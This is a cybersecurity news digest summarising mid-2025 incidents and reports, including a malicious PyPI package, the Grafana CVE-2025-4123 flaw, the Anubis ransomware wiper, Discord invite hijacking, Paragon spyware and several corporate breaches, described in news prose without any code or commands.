Daily Brief

95% of data breaches involve human error, underscoring the significance of managing human risks in cybersecurity. OutThink's 2025 report indicates organizations with active employee-security team collaboration report a 32% increase in profitability. Shifting from traditional security awareness programs to ongoing, adaptive human risk management enhances data security and business performance. Highly engaged security cultures within organizations decrease non-compliance among privileged users from 27% to 6%. Security champions are more prevalent in collaborative environments, leading to stronger security cultures and improved team performance. There is a strong correlation (0.78) between line managers' cyber engagement and the overall performance of their teams. Recommendations include moving beyond one-time training to continuous engagement and employing line managers as pivotal drivers of security culture.

Cybersecurity researchers have identified a malicious Python Package Index (PyPI) module designed to steal sensitive data from developers. The deceptive package, named chimera-sandbox-extensions, was downloaded 143 times, simulating functionality for the Chimera Sandbox tool developed by Grab. It targets AWS tokens, CI/CD environment variables, and macOS configurations, collecting these via a complex, multi-stage malware attack. Data captured by the stealer is transmitted to an attacker-controlled server, which then determines the potential for further exploitation of the infected system. This advanced threat highlights the significant evolution in malware sophistication, emphasizing the need for vigilant updating and proactive security measures by development teams. Additionally, various npm packages infected with malware have been removed after being downloaded multiple times, showcasing similar threats in JavaScript libraries. These incidents underline growing vulnerabilities within the open-source ecosystem, stressing the urgency for enhanced security practices and awareness among developers and corporations.

Australian Federal Police charged four individuals related to a sophisticated AU$190 million money laundering scheme. The scheme involved mixing legitimate business cash flows with illicit funds through a security company's armored cash transport service. Laundered funds were channeled through various businesses, including a sales promotion company, a classic car dealership, and cryptocurrency exchanges. The culprits returned the cleaned money to clients as cryptocurrency or via third-party businesses. Key suspects include the security company’s director, its general manager, a major client, and an individual handling the illicit fund transfers. This incident spotlights the challenges and complexities involved in detecting and combating financial crimes in the digital currency space. The case emphasizes the ongoing risks and regulatory concerns surrounding the use and abuse of cryptocurrencies in illegal activities.

Congressional Democrats Bennie Thompson and Zoe Lofgren have requested a GAO audit of the CVE (Common Vulnerabilities and Exposures) program due to concerns about continuity and funding. The Cybersecurity and Infrastructure Security Agency (CISA) managed to extend the funding for the CVE program for eleven months after original federal support ended in April. The request aims to evaluate the efficiency and effectiveness of government programs that support the National Vulnerability Database (NVD) and CVE, essential for global cybersecurity efforts. The Trump administration has proposed budget cuts to CISA, which have sparked concerns among Democrats and led to senior staff turnovers. New cybersecurity vulnerabilities identified include a critical XSS flaw in the Roundcube webmail platform, already being exploited in the wild. Multiple cybersecurity issues and incidents have been reported, including misuse of Discord invite links, a late-reported data breach at McLean Mortgage, and malicious use of the TeamFiltration tool against Microsoft Teams accounts. Researchers at Palo Alto Networks discovered a new JavaScript obfuscation method, dubbed JSF*ck, used to inject malicious code on numerous websites, highlighting ongoing threats and the need for robust cybersecurity defenses.

Over 46,000 internet-facing Grafana instances are vulnerable to an exploitable bug, CVE-2025-4123, due to lack of timely patching. The vulnerability enables attackers to execute malicious plugins and take over user accounts by exploiting client-side open redirect flaws. Discovered by bug bounty hunter Alvaro Balada, Grafana Labs issued security updates on May 21, but approximately 36% of instances remain unpatched. OX Security demonstrated the potential for attackers to execute arbitrary JavaScript and hijack user sessions without needing elevated privileges. Attackers can exploit the bug by tricking victims into clicking malicious URLs, which load harmful plugins altering user credentials and permissions settings. The default Content Security Policy in Grafana partially mitigates the risk; however, it does not fully prevent the exploitation of this vulnerability. Administrators are urged to update vulnerable Grafana instances to the corrected versions as listed to minimize exposure to potential cyberattacks.

WestJet, Canada's second-largest airline, reported a cyberattack affecting their internal systems and mobile app. The attack prevented users from logging into the WestJet website and mobile application, though these services have since been restored. WestJet has engaged internal specialist teams, law enforcement, and Transport Canada to investigate the breach and mitigate impacts. The airline strives to ensure continual safe operations and protection of sensitive data including personal information of guests and employees. The nature of the cyberattack, whether ransomware or another form, remains unconfirmed as systems' access loss details are still undetermined. WestJet issued an apology for any inconvenience to guests due to the disruption of services. An update on Saturday morning indicated that the company's operations remain secure despite the attack affecting certain software and services.

The Anubis ransomware-as-a-service (RaaS) has integrated a wiper module that destroys files beyond recovery, even if the ransom is paid. Anubis, not associated with Android malware of the same name, began as a RaaS in December 2024 and recently increased its operational activity. Operators launched an affiliate program through the RAMP forum as of February 23, offering various earnings percentages to partners based on role. Although only eight victims are currently listed on Anubis' extortion page, enhancements in the RaaS could potentially lead to an increase in attack volume. Trend Micro reports new Anubis samples featuring a wiper function intended to coerce quicker payments by making data recovery impossible. Essential system and program directories are excluded from the attack to maintain usability, while encryption uses the ECIES scheme with a unique '.anubis' file extension. Anubis deploys its attacks primarily via phishing emails containing malicious links or attachments, according to Trend Micro’s findings.

A new malware campaign targets Discord users by hijacking invite links to deliver Skuld Stealer and AsyncRAT, focusing on crypto wallets. Attackers use expired or deleted Discord invite links, redirecting to malicious servers by exploiting a vulnerability in Discord's invite system. The campaign employs phishing, multi-stage loaders, and evasion techniques, using legitimate services like GitHub and Pastebin for stealth. The malware includes a customized Skuld Stealer and AsyncRAT, designed to steal sensitive data and provide remote access control. Users are deceived into downloading the malware through a social engineering tactic, where a PowerShell command disguised as a verification process is initiated. Stolen data includes information from browsers, Discord, and crypto wallets, particularly targeting seed phrases and passwords. The attack also uses a custom ChromeKatz version to evade Chrome encryption, with data exfiltration done via Discord webhook. Discord has disabled the malicious bot involved, disrupting the campaign; other similar campaigns by the same actors target users globally.

The ongoing Israel-Iran military conflict has evolved into a hybrid war, with both nations leveraging cyberattacks alongside traditional military operations. Iran is expected to escalate its cyber operations against Israel, potentially extending these activities to target the United States, in retaliation for recent Israeli airstrikes. Experts including former White House advisor Michael Daniel emphasize that both countries possess advanced cyber capabilities, ranging from DDoS attacks to destructive wiper attacks, used for both espionage and potential sabotage. There is increasing concern that Iranian cyberattacks could target U.S. critical infrastructure and private sectors, following demonstrated intrusions into U.S. water systems using basic security flaws. Despite their technical capability, Iranian groups like CyberAv3ngers have shown limited understanding of the systems they have infiltrated, reducing the immediate impact of their past cyberattacks. Cybersecurity professionals warn that Iran might activate more cyber operatives or encourage pro-regime hackers to intensify attacks against both Israeli and U.S. targets in response to military setbacks. The U.S. is particularly vulnerable to Iranian cyberattacks due to existing cybersecurity weaknesses in small utilities and critical infrastructure. Officials also caution against overestimating the impact of these cyberattacks, as Iran and its allies, including Russia and China, might use exaggerated claims for psychological effect.

Tech Transparency Project report reveals numerous VPN apps in Apple and Google stores with Chinese ownership, unclear to users. Chinese law mandates local companies to aid national intelligence, raising privacy concerns for app users. Apple's App Store guidelines state VPN apps must not misuse user data, but enforcement is questionable with Chinese apps. Out of 20 popular free VPNs analyzed, several are linked to Qihoo 360, a firm on the US Entity List due to alleged ties with China's PLA. Despite concerns, apps like Turbo VPN and VPN Proxy Master remain accessible in US markets. Google's policies lack specific clauses for VPNs, focusing instead on general data transparency. Neither tech giant has responded to inquiries regarding the security and origin of these VPN developers.

Hackers are exploiting a flaw in Discord's invite system to redirect users to malware-infested sites by reusing expired or deleted invite links. The vulnerability allows the recovery of custom invite codes from level 3 servers that lost their status or for expired temporary and deleted permanent invites. Cybercriminals create malicious Discord servers that appear legitimate to unsuspecting users, tricking them into downloading malware through a crafted "verification" process. The campaign has affected over 1,300 users across the US, UK, France, the Netherlands, and Germany. From these malicious sites, multiple stages of infection are launched, including the use of PowerShell, obfuscated C++ loaders, and VBScript files ultimately leading to remote access trojans and information-stealing malware. Ongoing malware persistence is ensured by scheduled tasks that rerun the malware every five minutes. Users are advised to distrust outdated invite links and verification requests, and server admins to prefer permanent invites for security.

Apple updated iOS/iPadOS to fix a zero-click exploit used by Paragon's Graphite spyware, which targeted journalists. Two journalists notified by Apple in April confirmed spyware infections, prompting an investigation by The Citizen Lab. The vulnerability, cataloged as CVE-2025-43200, allowed spyware to be deployed via maliciously crafted photos or videos shared through iCloud Link. The Citizen Lab traced the spyware attacks back to the same group, suggesting targeted surveillance of specific individuals and organizations. Notifications of potential spyware attacks were also sent to approximately 90 journalists and activists via WhatsApp. The Italian government ended contracts with Paragon following a report linking the spyware to infections of high-profile individuals, including journalists and human rights activists. Security experts warn Graphite spyware operates covertly, creating significant challenges for traditional mobile security measures. Apple’s latest security measures recommend users update their devices and activate Lockdown Mode to protect against such sophisticated exploits.

Cybersecurity experts have discovered a significant campaign where over 269,000 web pages were infected by JSFireTruck, a malicious JavaScript technique, within one month. The JSFireTruck method involves using obfuscated code written in JSFuck—an esoteric programming style—making analysis and detection challenging. The malware checks the referrer URL of visitors; if detected as coming from a major search engine, it redirects them to malicious sites that can lead to further malware infections or scams. The analysis revealed a major spike in infections on April 12, with around 50,000 web pages compromised in a single day, highlighting the scale and precision of the attack. In conjunction with the JSFireTruck campaign, a related traffic distribution service (TDS) named HelloTDS has been implemented to redirect users to deceptive sites based on their geographic location, IP, and device fingerprinting. HelloTDS employs a multi-stage, dynamic approach using various top-level domains to host malicious content and manage redirection, effectively evading detection and selectively targeting victims. This campaign illustrates sophisticated persistence and evolution in attack strategies, posing a substantial threat due to its stealth and widespread nature.

ISC2 highlights unrealistic job expectations in cybersecurity job descriptions for junior roles, impacting hiring success. Entry-level ads often demand advanced certifications and years of experience beyond the realm of possibility for newcomers. Over a third of hiring managers expect early-stage professionals to hold senior certifications like CISSP, which is unrealistic. The necessity for on-the-job training and development support is emphasized to bridge the skills gap in cybersecurity. Technical skills are highly valued in India, while other regions prioritize interpersonal skills alongside technical know-how. Diversity in educational background can be beneficial, as hiring from non-STEM fields brings new perspectives to cybersecurity. Current strategic shifts include sourcing candidates from internships, apprenticeships, and varied educational pathways. The cybersecurity job market is moving towards specialization, with a decreasing demand for generalists and an oversaturated market post-recent layoffs.

Victoria's Secret successfully restored all critical systems after a cyberattack on May 24, impacting corporate and e-commerce operations. The fashion retailer has resumed full functionality and is collaborating with external security experts to assess the attack's ramifications. Despite the significant breach, Victoria's Secret anticipates no substantial impact on its fiscal results for 2025, though it may face ongoing attack-related expenses. The cyberattack forced the company to delay the release of its Q1 financial results as essential systems were temporarily inaccessible. The breach is part of a broader wave of cyberattacks targeting major fashion and retail brands globally, indicating a potentially coordinated threat. No groups have yet claimed responsibility for the cyberattack on Victoria's Secret, and the company has withheld specific details about the breach's nature.